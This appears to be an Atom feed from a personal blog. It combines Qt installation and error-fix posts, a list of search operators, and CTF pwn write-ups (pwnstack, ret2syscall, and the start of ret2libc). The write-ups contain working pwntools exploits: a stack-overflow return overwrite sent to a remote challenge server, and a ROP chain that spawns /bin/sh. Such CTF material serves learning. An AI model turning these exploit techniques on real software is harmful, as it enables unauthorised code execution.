<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Tech Stack</title>
<subtitle>Share station</subtitle>
<link href="https://www.rgzzplus.com/atom.xml" rel="self"/>
<link href="https://www.rgzzplus.com/"/>
<updated>2022-10-17T00:26:49.173Z</updated>
<id>https://www.rgzzplus.com/</id>
<author>
<name>rgzzplus</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Qt Creator usage tips</title>
<link href="https://www.rgzzplus.com/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/"/>
<id>https://www.rgzzplus.com/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/</id>
<published>2022-10-17T00:24:14.000Z</published>
<updated>2022-10-17T00:26:49.173Z</updated>
<content type="html"><![CDATA[<h1 id="qt-creater使用技巧"><a class="markdownIt-Anchor" href="#qt-creater使用技巧"></a> Qt Creator usage tips</h1>
<p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220925142033220.png" alt="image-20220925142033220"></p>
<p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220925143842790.png" alt="image-20220925143842790"></p>
<h1 id="qt报错"><a class="markdownIt-Anchor" href="#qt报错"></a> Qt errors</h1>
<h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2>
<p><a href="https://www.cnblogs.com/mengydz/p/14781121.html">/usr/bin/ld: cannot find -lpulse-mainloop-glib, -lpulse, -lglib-2.0; collect2: error: ld returned 1</a></p>
<p>Note: if multimedia and multimediawidgets are added to the Qt project file and QCamera is used, this error can appear. It occurs because the linker cannot find the libraries:</p>
<p>Fix:<br>1) In the usr directory, run:</p>
<pre><code class="language-bash">sudo find / -name 'libpulse.so*'

sudo cp /usr/lib/x86_64-linux-gnu/libpulse.so.0 /usr/lib/libpulse.so

# libpulse.so now exists under /usr/lib
</code></pre>
<p>2) In the usr directory, run:</p>
<pre><code class="language-bash">sudo find / -name 'libpulse-mainloop-glib.so*'

sudo cp /usr/lib/x86_64-linux-gnu/libpulse-mainloop-glib.so.0.0.5 /usr/lib/libpulse-mainloop-glib.so

# libpulse-mainloop-glib.so now exists under /usr/lib
</code></pre>
<p>3) In the usr directory, run:</p>
<pre><code class="language-bash">sudo find / -name 'libglib-2.0.so*'

sudo cp /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 /usr/lib/libglib-2.0.so

# libglib-2.0.so now exists under /usr/lib
</code></pre>
<p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220928221619195.png" alt="image-20220928221619195"></p>
<h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2>
<p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220929094743081.png" alt="image-20220929094743081"></p>
<p>Qt: Could not parse stylesheet of object 0x7f7990</p>
<p>Look for the setStyleSheet() calls you wrote,</p>
<p>then check whether there are any stray brackets or punctuation inside; deleting them resolves it.</p>
<p>In my case the image path was missing url; adding url at the cursor position shown below fixes it.</p>
<p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220929094916223.png" alt="image-20220929094916223"></p>]]></content>
<category term="c++" scheme="https://www.rgzzplus.com/categories/c/"/>
<category term="QT" scheme="https://www.rgzzplus.com/tags/QT/"/>
</entry>
<entry>
<title>Qt installation tutorial</title>
<link href="https://www.rgzzplus.com/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/"/>
<id>https://www.rgzzplus.com/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/</id>
<published>2022-10-17T00:22:14.000Z</published>
<updated>2022-10-17T00:25:21.573Z</updated>
<content type="html"><![CDATA[<p>This article is reposted from: <a href="https://www.cnblogs.com/minuy/p/14430897.html">Installing the Qt development environment on Linux</a></p>
<h1 id="linux下安装qt开发环境"><a class="markdownIt-Anchor" href="#linux下安装qt开发环境"></a> Installing the Qt development environment on Linux</h1>
<h2 id="零-下载安装包"><a class="markdownIt-Anchor" href="#零-下载安装包"></a> 0. Download the installer</h2>
<p>Every Qt version can be downloaded from:</p>
<blockquote><p><a href="https://download.qt.io/">https://download.qt.io/</a></p></blockquote>
<p>This walkthrough installs version 5.9.0, a long-term-support release, so go to archive/qt/5.9/5.9.0</p>
<p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160443163-190757006.png" alt="img"></p>
<p>Since we are on Linux, choose the Linux installer: click the file name to download and save it. If the download is slow, a download manager such as Thunder (迅雷) is recommended.</p>
<blockquote><p>Installer download address: <a href="https://download.qt.io/archive/qt/5.9/5.9.0/qt-opensource-linux-x64-5.9.0.run">https://download.qt.io/archive/qt/5.9/5.9.0/qt-opensource-linux-x64-5.9.0.run</a></p></blockquote>
<h2 id="壹-安装"><a class="markdownIt-Anchor" href="#壹-安装"></a> 1. Install</h2>
<p>Once the download finishes, open a terminal and change into the download directory, usually the <em>~/下载</em> folder (if you cannot type Chinese, list it with ls and copy the name).</p>
<p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160458536-1252883591.png" alt="img"></p>
<p>Give the installer execute permission</p>
<p>Command:</p>
<pre><code class="language-plaintext">chmod +x qt-opensource-linux-x64-5.9.0.run
</code></pre>
<p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160510358-651776639.png" alt="img"></p>
<p>Run the installer to reach the setup screen</p>
<p>Command:</p>
<pre><code class="language-plaintext">./qt-opensource-linux-x64-5.9.0.run
</code></pre>
<p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160559148-2047339372.png" alt="img"></p>
<p>It asks you to log in; click Skip to continue</p>
<p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160545697-1801504264.png" alt="img"></p>
<p>Select components: tick what you need, but the recommended selection is everything under the Qt entry plus gcc</p>
<p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160611259-347874521.png" alt="img"></p>
<p>Then follow the wizard step by step and the installation completes.</p>
<h2 id="贰-错误解决"><a class="markdownIt-Anchor" href="#贰-错误解决"></a> 2. Fixing errors</h2>
<p>Two problems usually appear after installation.</p>
<p>One is an error when running qmake:</p>
<pre><code class="language-plaintext">15:50:56: Could not determine which "make" command to run. Check the "make" step in the build configuration.
Error while building/deploying project planets-qml (kit: Desktop Qt 5.9.0 GCC 64bit)

When executing step "qmake"
</code></pre>
<p>The other is that lGL cannot be found:</p>
<pre><code class="language-plaintext">../../../../5.9/gcc_64/include/QtGui/qopengl.h:139:13: fatal error: GL/gl.h: No such file or directory
  139 | # include &lt;GL/gl.h&gt;
      |           ^~~~~~~~~
compilation terminated.
make: *** [Makefile:1009: main.o] Error 1
15:55:01: 进程"/usr/bin/make"退出,退出代码 2 。
Error while building/deploying project planets-qml (kit: Desktop Qt 5.9.0 GCC 64bit)
When executing step "Make"
</code></pre>
<p>The cause is that the required packages are not installed.</p>
<p>Fix for the first error:</p>
<pre><code class="language-bash">sudo apt install cmake g++
</code></pre>
<p>Fix for the second error:</p>
<pre><code class="language-bash">sudo apt install libgl1-mesa-dev
</code></pre>
<h2 id="叁-结果"><a class="markdownIt-Anchor" href="#叁-结果"></a> 3. Result</h2>
<p>After the steps above, the examples compile and run normally:<br><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160810909-2031390402.png" alt="img"></p>
<h2 id="肆-参考"><a class="markdownIt-Anchor" href="#肆-参考"></a> 4. References:</h2>
<p><a href="http://c.biancheng.net/view/3851.html">http://c.biancheng.net/view/3851.html</a></p>
<p><a href="http://c.biancheng.net/view/3886.html">http://c.biancheng.net/view/3886.html</a></p>
<p><a href="http://c.biancheng.net/view/3858.html">http://c.biancheng.net/view/3858.html</a></p>
<p><a href="https://blog.csdn.net/aaa123524457/article/details/82668194">https://blog.csdn.net/aaa123524457/article/details/82668194</a></p>]]></content>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="QT" scheme="https://www.rgzzplus.com/tags/QT/"/>
</entry>
<entry>
<title>Advanced search</title>
<link href="https://www.rgzzplus.com/2022/10/14/%E9%AB%98%E7%BA%A7%E6%90%9C%E7%B4%A2/"/>
<id>https://www.rgzzplus.com/2022/10/14/%E9%AB%98%E7%BA%A7%E6%90%9C%E7%B4%A2/</id>
<published>2022-10-14T12:32:53.000Z</published>
<updated>2022-10-14T12:34:10.944Z</updated>
<content type="html"><![CDATA[<h1 id="高级搜索模式"><a class="markdownIt-Anchor" href="#高级搜索模式"></a> Advanced search syntax</h1>
<ul>
<li><p>Double quotes (" ")<br>Exact match.<br>Example: searching <strong>“操作系统”</strong> matches the keyword exactly.</p></li>
<li><p>*<br>The common wildcard, standing for any string.<br>Example: searching <strong>我的*不是梦</strong> matches results such as <strong>我的未来不是梦</strong>.</p></li>
<li><p>?<br>Like *, but stands for a single character.<br>Example: <strong>计算机?级考试</strong> matches results such as <strong>计算机等级考试</strong></p></li>
<li><p>Tilde (~)<br>Finds synonyms. <strong>PS:</strong> in my testing it does not work well</p></li>
<li><p>OR<br>Multiple keywords are combined with "and" by default; <strong>OR</strong> expresses "or", and <strong>|</strong> can be used instead.<br>Example: <strong>古诗词or名人名言</strong></p></li>
<li><p>and<br>Combines keywords; <strong>+</strong> or a <strong>space</strong> can be used instead.<br>Example: <strong>乔布斯+名人名言</strong></p></li>
<li><p>not<br>Can be written as - (minus); excludes the term that follows. A space goes before the minus and none after it.<br>Example: searching <strong>JavaScript -jquery</strong> returns results that do not contain jquery.</p></li>
<li><p>site:<br>Searches all pages under a given domain.<br>Example: <strong>python site:www.runoob.com</strong></p></li>
<li><p>filetype:<br>Searches for a specific file format.<br>Example: <strong>filetype:txt 斗罗大陆</strong></p></li>
<li><p>inurl:<br>Finds pages whose URL contains the query term; Chinese is supported.<br>Example: <strong>inurl:vue</strong></p></li>
<li><p>intitle:<br>Returns pages whose title contains the keyword.<br>Example: <strong>intitle:大王饶命</strong></p></li>
<li><p>allintitle:<br>Like intitle:, but with several keywords.<br>Example: <strong>allintitle:大王饶命 吕小鱼</strong></p></li>
<li><p>related:<br>Finds similar sites.<br>Example: related:<a href="http://www.google.com">http://www.google.com</a></p></li>
<li><p>define:<br>Works like a dictionary; Chinese characters are supported.<br>Example: <strong>define:引擎</strong>. <strong>PS:</strong> in my testing it does not work well</p></li>
</ul>]]></content>
<category term="高级搜索" scheme="https://www.rgzzplus.com/categories/%E9%AB%98%E7%BA%A7%E6%90%9C%E7%B4%A2/"/>
<category term="搜索引擎" scheme="https://www.rgzzplus.com/tags/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E/"/>
</entry>
<entry>
<title>pwnstack</title>
<link href="https://www.rgzzplus.com/2022/10/03/pwnstack/"/>
<id>https://www.rgzzplus.com/2022/10/03/pwnstack/</id>
<published>2022-10-03T01:38:34.000Z</published>
<updated>2022-10-03T01:39:42.462Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://adworld.xctf.org.cn/challenges/details?hash=de8efbe6-17ae-11ed-9827-fa163e4fa633&amp;task_category_id=2">Challenge link</a> pwnstack</p></blockquote>
<h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2>
<p>After downloading the file, first run file to see the file type, and checksec to see the protections.</p>
<pre><code class="language-shell">sakura@Kylin:~/下载/pwnstack$ file pwn2
pwn2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62aa40d64871e142a32827b4e403772e72f67fba, not stripped
sakura@Kylin:~/下载/pwnstack$ checksec pwn2
[*] '/home/sakura/下载/pwnstack/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
</code></pre>
<p>This is a 64-bit binary, and only the NX protection is enabled.</p>
<h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2>
<p>Next, load it into IDA and look at the decompiled source.</p>
<pre><code class="language-c">__int64 vuln()
{
  char buf[160]; // [rsp+0h] [rbp-A0h] BYREF

  memset(buf, 0, sizeof(buf)); // zero the whole buffer
  read(0, buf, 0xB1uLL);       // 0xB1 = 177 bytes, 17 more than buf holds
  return 0LL;
}

__int64 initsetbuf()
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  return 0LL;
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  initsetbuf(argc, argv, envp);
  puts("this is pwn1,can you do that??");
  vuln();
  return 0;
}
</code></pre>
<p>Since only NX is enabled, overflowing buf to overwrite the function's return address is enough.</p>
<pre><code class="language-shell">peda$ pattern create 200
peda$ pattern offset .........
</code></pre>
<p><img src="/2022/10/03/pwnstack/image-20220922202634809.png" alt="image-20220922202634809"></p>
<p><img src="/2022/10/03/pwnstack/image-20220922202345579.png" alt="image-20220922202345579"></p>
<p>The padding length comes out to 168 bytes.</p>
<h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2>
<p>First check whether pwn2 already contains a system() call; if it does, we do not need to build one ourselves.</p>
<p><img src="/2022/10/03/pwnstack/image-20220922220713163.png" alt="image-20220922220713163"></p>
<pre><code class="language-python">from pwn import *

# sh = process("./pwn2")
sh = remote('61.147.171.105', 54665)
# context.log_level = 'debug'

system = 0x400766
# 0x400766 is used here rather than 0x400762 so that the stack layout is not disturbed.
payload = b'a' * 0xa0 + b'a' * 8 + p64(system)
sh.recv()
sh.sendline(payload)

sh.interactive()
</code></pre>
<h2 id="0x4"><a class="markdownIt-Anchor" href="#0x4"></a> 0x4</h2>
<p><strong>Testing</strong></p>
<p><img src="/2022/10/03/pwnstack/image-20220922221704374.png" alt="image-20220922221704374"></p>
<p>Remote test:</p>
<p><img src="/2022/10/03/pwnstack/image-20220922221935298.png" alt="image-20220922221935298"></p>]]></content>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="pwnstack" scheme="https://www.rgzzplus.com/tags/pwnstack/"/>
</entry>
<entry>
<title>Loading a specific glibc version for pwn challenges</title>
<link href="https://www.rgzzplus.com/2022/10/03/PWN%E9%A2%98%E7%9B%AE%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9A%E7%89%88%E6%9C%AC%E7%9A%84glibc/"/>
<id>https://www.rgzzplus.com/2022/10/03/PWN%E9%A2%98%E7%9B%AE%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9A%E7%89%88%E6%9C%AC%E7%9A%84glibc/</id>
<published>2022-10-03T01:38:08.000Z</published>
<updated>2022-10-03T01:40:20.172Z</updated>
<content type="html"><![CDATA[<h3 id="指定libc"><a class="markdownIt-Anchor" href="#指定libc"></a> Specifying the libc</h3>
<p>There are two methods. One uses patchelf to change the ELF's ld interpreter and the libc it loads. The other runs a script; the underlying principle is much the same.</p>
<p>First copy the libc and the ld loader into the challenge directory (absolute paths also work if you do not mind the extra typing).</p>
<p>patchelf:</p>
<pre><code class="language-shell">patchelf --set-interpreter ./ld.so.2 ./elfname
patchelf --set-rpath . ./elfname   # rpath is a directory, not a file; the loader looks up libc.so.6 inside it
patchelf --replace-needed libc.so.6 ./libc-2.2?.so ./elfname   # only if the copied libc is not named libc.so.6
</code></pre>
<p>Script (note that the libc and elfname must be in the same directory):</p>
<pre><code class="language-python"># coding=utf-8

from pwn import *

# Start the binary through the chosen ld and preload the matching libc, so the
# process really runs against libc-2.27 instead of the system libc.
sh = process(['./ld.so.2', './elfname'], env={'LD_PRELOAD': './libc-2.27.so'})
libc = ELF("./libc-2.27.so")
</code></pre>
<blockquote><p>Reference:</p><p><a href="https://surager.pub/_posts/2020-03-10-pwn%E9%A2%98%E7%9B%AE%E6%9C%AC%E5%9C%B0%E8%B0%83%E8%AF%95%E5%8A%A0%E8%BD%BDlibc%E7%89%88%E6%9C%AC/">Loading a libc version when debugging pwn challenges locally</a></p></blockquote>]]></content>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="libc" scheme="https://www.rgzzplus.com/tags/libc/"/>
</entry>
<entry>
<title>ret2syscall</title>
<link href="https://www.rgzzplus.com/2022/09/18/ret2syscall/"/>
<id>https://www.rgzzplus.com/2022/09/18/ret2syscall/</id>
<published>2022-09-18T02:24:54.000Z</published>
<updated>2022-09-29T14:23:18.811Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">Challenge link</a> ret2syscall</p></blockquote>
<h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2>
<p>After downloading the file, first run file to see the file type, and checksec to see the protections.</p>
<pre><code class="language-shell">sakura@Kylin:~/下载/ret2syscall$ file rop
rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=2bff0285c2706a147e7b150493950de98f182b78, with debug_info, not stripped
sakura@Kylin:~/下载/ret2syscall$ checksec rop
[*] '/home/sakura/下载/ret2syscall/rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
</code></pre>
<p>This is a 32-bit binary, and only the NX protection is enabled.</p>
<h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2>
<p>Next, load it into IDA and look at the decompiled source.</p>
<pre><code class="language-c">int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("This time, no system() and NO SHELLCODE!!!");
  puts("What do you plan to do?");
  gets(&amp;v4);
  return 0;
}
</code></pre>
<p>The source contains a gets() call, which reads a string until a newline is entered, with no bound on the length, so it is our overflow target. It stores what it reads in v4, whose offset from ebp is 0x64 + 0x8 (line 3 of the pseudocode), so we need 112 bytes of padding to reach the return address. Because NX is enabled we cannot fill the stack with our own shellcode to get a shell, so we use <strong>code fragments (gadgets)</strong> already present in the program instead.</p>
<h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2>
<p>The call we need to construct: <code>execve("/bin/sh", NULL, NULL)</code></p>
<p>Because the program is 32-bit, we need the registers set up as</p>
<pre><code class="language-plaintext">eax = 0xb
ebx --> "/bin/sh"
ecx = 0
edx = 0
</code></pre>
<p>How do we control these register values? This is where gadgets come in. For example, if the top of the stack holds 10 and a pop eax executes, eax becomes 10. We cannot expect a single contiguous code sequence to set every register at once, so we set them one piece at a time; that is why each gadget ends in ret, which hands control back to the next address on the stack. The ROPgadget tool can be used to find gadgets.</p>
<p>The following command lists every <code>pop reg; ret;</code> sequence in the program</p>
<pre><code class="language-plaintext">sakura@Kylin:~/下载/ret2syscall$ ROPgadget --binary rop --only 'pop|ret' | grep 'pop'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809d7b2 : pop ds ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bb196 : pop eax ; ret
0x0807217a : pop eax ; ret 0x80e
0x0804f704 : pop eax ; ret 3
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d5 : pop ebp ; pop esi ; pop edi ; ret
0x0804838e : pop ebp ; ret
0x080a9a45 : pop ebp ; ret 0x10
0x08096a29 : pop ebp ; ret 0x14
0x08070d76 : pop ebp ; ret 0xc
0x0804854a : pop ebp ; ret 4
0x08049c00 : pop ebp ; ret 8
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x08048547 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0804838d : pop edi ; pop ebp ; ret
0x080a9a44 : pop edi ; pop ebp ; ret 0x10
0x08096a28 : pop edi ; pop ebp ; ret 0x14
0x08070d75 : pop edi ; pop ebp ; ret 0xc
0x08048549 : pop edi ; pop ebp ; ret 4
0x08049bff : pop edi ; pop ebp ; ret 8
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0805c508 : pop edi ; pop esi ; ret
0x0804846f : pop edi ; ret
0x08049a1b : pop edi ; ret 4
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x0806eb6a : pop edx ; ret
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080671ea : pop es ; pop edi ; ret
0x0806742a : pop es ; 
ret</span><br><span class="line">0x08092259 : pop esi ; pop ebp ; ret</span><br><span class="line">0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret</span><br><span class="line">0x0805c820 : pop esi ; pop ebx ; ret</span><br><span class="line">0x0804838c : pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080a9a43 : pop esi ; pop edi ; pop ebp ; ret 0x10</span><br><span class="line">0x08096a27 : pop esi ; pop edi ; pop ebp ; ret 0x14</span><br><span class="line">0x08070d74 : pop esi ; pop edi ; pop ebp ; ret 0xc</span><br><span class="line">0x08048548 : pop esi ; pop edi ; pop ebp ; ret 4</span><br><span class="line">0x08049bfe : pop esi ; pop edi ; pop ebp ; ret 8</span><br><span class="line">0x0804846e : pop esi ; pop edi ; ret</span><br><span class="line">0x08049a1a : pop esi ; pop edi ; ret 4</span><br><span class="line">0x08049a95 : pop esi ; ret</span><br><span class="line">0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080bb146 : pop esp ; ret</span><br><span class="line">0x0807b6ed : pop ss ; pop ebx ; ret</span><br><span class="line">0x080639f9 : pop ss ; ret 0x2c73</span><br><span class="line">0x080643ba : pop ss ; ret 0x3273</span><br><span class="line">0x080639e4 : pop ss ; ret 0x3e73</span><br><span class="line">0x080643a0 : pop ss ; ret 0x4c73</span><br><span class="line">0x080639cf : pop ss ; ret 0x5073</span><br><span class="line">0x080639ba : pop ss ; ret 0x6273</span><br><span class="line">0x08064386 : pop ss ; ret 0x6673</span><br><span class="line">0x08061f05 : pop ss ; ret 0x830f</span><br></pre></td></tr></table></figure><p>We pick the following instructions to set up the registers:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0x080bb196 : pop eax ; ret</span><br><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br></pre></td></tr></table></figure><p>We also need the address of the /bin/sh string and the address of <code>int 0x80</code></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2syscall$ ROPgadget --binary rop --string '/bin/sh' </span><br><span class="line">Strings information</span><br><span class="line">============================================================</span><br><span class="line">0x080be408 : /bin/sh</span><br><span class="line">sakura@Kylin:~/下载/ret2syscall$ ROPgadget --binary rop --only 'int'</span><br><span class="line">Gadgets information</span><br><span class="line">============================================================</span><br><span class="line">0x08049421 : int 0x80</span><br><span class="line"></span><br><span class="line">Unique gadgets found: 1</span><br></pre></td></tr></table></figure><p>Next we build the payload.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">|+————————+|</span><br><span class="line">|+aaaaaaaa+|</span><br><span class="line">|+........+|</span><br><span class="line">|+aaaaaaaa+|</span><br><span class="line">|+pop eax; ret+|</span><br><span class="line">|+0xb+|</span><br><span class="line">|+pop edx; pop ecx; pop ebx; ret+|</span><br><span class="line">|+0x0+|</span><br><span
class="line">|+0x0+|</span><br><span class="line">|+/bin/sh+|</span><br><span class="line">|+int 0x80+|</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2syscall.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">'./rop'</span>)</span><br><span class="line"></span><br><span class="line">pop_eax = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx = <span class="number">0x0806eb90</span></span><br><span class="line">int_0x80 = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x080be408</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"a"</span>*(<span class="number">112</span>)</span><br><span class="line">payload += p32(pop_eax)</span><br><span class="line">payload += p32(<span class="number">0xb</span>)</span><br><span class="line">payload += p32(pop_edx_ecx_ebx)</span><br><span class="line">payload += p32(<span class="number">0x0</span>)</span><br><span class="line">payload += p32(<span class="number">0x0</span>)</span><br><span class="line">payload += 
p32(binsh)</span><br><span class="line">payload += p32(int_0x80)</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><h2 id="0x4"><a class="markdownIt-Anchor" href="#0x4"></a> 0x4</h2><p><strong>Test</strong></p><p><img src="/2022/09/18/ret2syscall/image-20220915000135702.png" alt="image-20220915000135702"></p>]]></content>
<summary type="html"><blockquote>
<p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">Challenge link</a> ret2syscall</p>
</blockquote>
<h</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2syscall" scheme="https://www.rgzzplus.com/tags/ret2syscall/"/>
</entry>
<entry>
<title>ret2libc</title>
<link href="https://www.rgzzplus.com/2022/09/18/ret2libc/"/>
<id>https://www.rgzzplus.com/2022/09/18/ret2libc/</id>
<published>2022-09-18T02:24:41.000Z</published>
<updated>2022-09-18T02:52:32.005Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">Challenge link</a> ret2libc</p></blockquote><h1 id="ret2libc"><a class="markdownIt-Anchor" href="#ret2libc"></a> ret2libc</h1><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p>After downloading the file, check its type with file and, while at it, its protections with checksec.</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc1$ file ret2libc1</span><br><span class="line">ret2libc1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fb89c86b266de4ff294489da59959a62f7aa1e61, with debug_info, not stripped</span><br><span 